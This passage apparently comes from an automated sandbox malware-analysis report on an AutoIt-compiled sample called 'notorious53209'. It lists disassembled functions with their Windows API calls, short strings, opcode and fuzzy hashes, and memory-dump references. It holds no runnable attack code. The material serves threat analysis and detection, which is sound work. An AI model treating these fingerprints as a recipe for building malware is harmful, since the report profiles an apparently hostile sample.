                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: f9ab6a6f4619c7fbb570760ac5fe9679a87b11fd841764cb6ff070414c63cd53
                                                  • Instruction ID: 385def276fb0c5e1ddb3fa0db7ff1b400ed7baae93972256ebb6cec51eb75a60
                                                  • Opcode Fuzzy Hash: f9ab6a6f4619c7fbb570760ac5fe9679a87b11fd841764cb6ff070414c63cd53
                                                  • Instruction Fuzzy Hash: B0914A74600205EFDB24DF68C884B6ABBE8FF49710F15856EE94ACB791EB70E840CB50
                                                  Function 008EB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • __wcsnicmp.LIBCMT ref: 008EB298
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008EB361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 944435c9e30236c4335c98753836e9b26ba3361a071ba6a0765d5b462654f59f
                                                  • Instruction ID: 29930a8d20643bfbf1d6240b50f9a776b40aabe9e78ec3aa0f765e2c95add944
                                                  • Opcode Fuzzy Hash: 944435c9e30236c4335c98753836e9b26ba3361a071ba6a0765d5b462654f59f
                                                  • Instruction Fuzzy Hash: BC617E75A00259AFCB14EB99C882EAEB7F4FF09310F15406AF546EB391DB70AE40CB51
                                                  Function 00892AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00892AC8
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00892AE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                                                  • Instruction ID: cd4bc45ed203dd63084109a171acdfb235f55660e428d87c69c80ea0b3fb06a0
                                                  • Opcode Fuzzy Hash: 4691e1531b1c59f6f7fe5e8df5e659140be95995c920203c5ab9f22f8b721445
                                                  • Instruction Fuzzy Hash: 4F515671428B449BD320BF54D886BAFBBE8FF84314F56885DF1DA810A1DB308529CB27
                                                  Function 008E99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0088506B: __fread_nolock.LIBCMT ref: 00885089
                                                  • _wcscmp.LIBCMT ref: 008E9AAE
                                                  • _wcscmp.LIBCMT ref: 008E9AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                                                  • Instruction ID: b55f01638af0bd5ee055ca729b58c93fc5fa7bc337d282cc8dcf741fd316a279
                                                  • Opcode Fuzzy Hash: 57d9c85f98a7efb5518877f71640aa5dd640af397e1c5b777011da3b8a152af2
                                                  • Instruction Fuzzy Hash: 9F41C871A00659BADF20AAA9DC45FEFB7FDFF46714F000079F940E7181D6B5AA0487A2
                                                  Function 008F2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008F2892
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008F28C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 30d3eef10b166ece557aa017ae6a36464e3578be5d82149f75d0767f72050694
                                                  • Instruction ID: d7d51b3dddbbf6a0c00f27f2c0a7431c9b70616b4f20b0d18da2b614af90e11d
                                                  • Opcode Fuzzy Hash: 30d3eef10b166ece557aa017ae6a36464e3578be5d82149f75d0767f72050694
                                                  • Instruction Fuzzy Hash: D8311971904119AFCF11AFA5CC85EEEBFB9FF08300F104029F915E6166EB319A56DBA1
                                                  Function 00906CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?), ref: 00906D86
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00906DC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 00b0233cc0bcd1ad94069e0c3ccc938a1b0ec5092f390afc5764aa0607cdfa04
                                                  • Instruction ID: 09b0de5e23dcddd2ad21882fc3c78f839e016efdc68017fb3698498fe28e4ca8
                                                  • Opcode Fuzzy Hash: 00b0233cc0bcd1ad94069e0c3ccc938a1b0ec5092f390afc5764aa0607cdfa04
                                                  • Instruction Fuzzy Hash: 1D314C71210604AEEB109F68CC90BFB77ADFF89724F108619F9A6971D0DB35AC91DB60
                                                  Function 008E2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2E00
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008E2E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: b8adf548d3742ba0452a86f380f594cf63c1937067f30d8b789bb0b8108eae7f
                                                  • Instruction ID: c7e31bbc4700930934bc04927a92f3b841bf5624d1e9f36bad94056eacc9540a
                                                  • Opcode Fuzzy Hash: b8adf548d3742ba0452a86f380f594cf63c1937067f30d8b789bb0b8108eae7f
                                                  • Instruction Fuzzy Hash: 1C31F53160035AABEB34CF8AC845BAEBBBDFF07350F140069E985E61A2E7709940CB11
                                                  Function 00906943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009069D0
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009069DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                                                  • Instruction ID: 304606a0a8aca825db1306215ff216c39dca75e835ab8d5315d839ff8b887197
                                                  • Opcode Fuzzy Hash: 2af48d7ed09bd01b575b2d05b5dd31e8a570dfe95c8cd285ac197671d67ae845
                                                  • Instruction Fuzzy Hash: 5D11C4717002096FEF119F18CC90FBB376EEB893A4F114124F968976D0D7759CA197A0
                                                  Function 00906E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • GetWindowRect.USER32(00000000,?), ref: 00906EE0
                                                  • GetSysColor.USER32(00000012), ref: 00906EFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                                                  • Instruction ID: 9afdffde1efe0fa4cb2cb6489b05f83cc806158ddfd9eb156b66fede5b2440c9
                                                  • Opcode Fuzzy Hash: c4899ff4def43e366a21b7430463d8b90f47fd132cbefe4688b263c0c032612d
                                                  • Instruction Fuzzy Hash: 1721567262420AAFDF04DFA8CC45AFA7BB8FB08314F004628FD55D3290E734E8619B60
                                                  Function 00906B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00906C11
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00906C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                                                  • Instruction ID: 75aa8e16dc1c6d460a8e8c0f54ca314947c3d63a794e1104517712e7c8f5ce11
                                                  • Opcode Fuzzy Hash: 054edf2fad2047972dea5bab4d4f8034002c94885e9f53f4fdf5128722c50e5c
                                                  • Instruction Fuzzy Hash: 1A119DB1104208AFEB104E649C45ABA376DEB45378F104724F9A1D71E0C775DCA1AB60
                                                  Function 008E2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2F11
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008E2F30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                                                  • Instruction ID: e6bbc177319bea2ad55c50e7de54a64fbc04fcd14a14ad2ed0ca88664ca51b6a
                                                  • Opcode Fuzzy Hash: f4ec5eeb2d6f96b9af7d7e72d8a84d549bfc6bda3d7b7568fd6894e2d0ef6ffb
                                                  • Instruction Fuzzy Hash: 2A11D0729152A8ABDB34DB59DC04FAD73BDFB03314F0800A1E944F72A0DBB0AE048792
                                                  Function 008F24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008F2520
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008F2549
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                                                  • Instruction ID: 5f685dfd66b93a11b747174bfa0fcb121145ea7eb278ddcab1c5b95ffb077be4
                                                  • Opcode Fuzzy Hash: 18a3ee20f06361963e23aa350a3164c35057c692c8b9e6b1bbb876e1799bdc8a
                                                  • Instruction Fuzzy Hash: E411A3B0541629BEDB24CF618C95EBBFF68FF19755F10812AF60586040D2705991DAF1
                                                  Function 008F80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008F80C8,?,00000000,?,?), ref: 008F8322
                                                  • inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • htons.WS2_32(00000000), ref: 008F8108
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                  • String ID: 255.255.255.255
                                                  • API String ID: 2496851823-2422070025
                                                  • Opcode ID: 88c5afda23f399f845d0d14eedeb3de3f29ee176cd36267938e9ba2788637641
                                                  • Instruction ID: e84b4757a84b73ede6a06cec3d551c4a367263ac0642cbf31da4684d217c5ecf
                                                  • Opcode Fuzzy Hash: 88c5afda23f399f845d0d14eedeb3de3f29ee176cd36267938e9ba2788637641
                                                  • Instruction Fuzzy Hash: 36118E35604209EBDB24AF68CC96BBDB368FF44324F108627EA11D7291DA72A8158796
                                                  Function 008D92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008D9355
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 0d4ae6e47d7ae9f8d31e9c4d571ac9839b223b81df1609d238b13af8ac131453
                                                  • Instruction ID: 676be7fd9fe7de035c65042f7807d84af8682b96e54f056ac5ac8b52eae803a6
                                                  • Opcode Fuzzy Hash: 0d4ae6e47d7ae9f8d31e9c4d571ac9839b223b81df1609d238b13af8ac131453
                                                  • Instruction Fuzzy Hash: AD019271A45218ABCB08FB68CC918FE7769FF46720B14171AF972A73D1DB3159088751
                                                  Function 008D91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 008D924D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
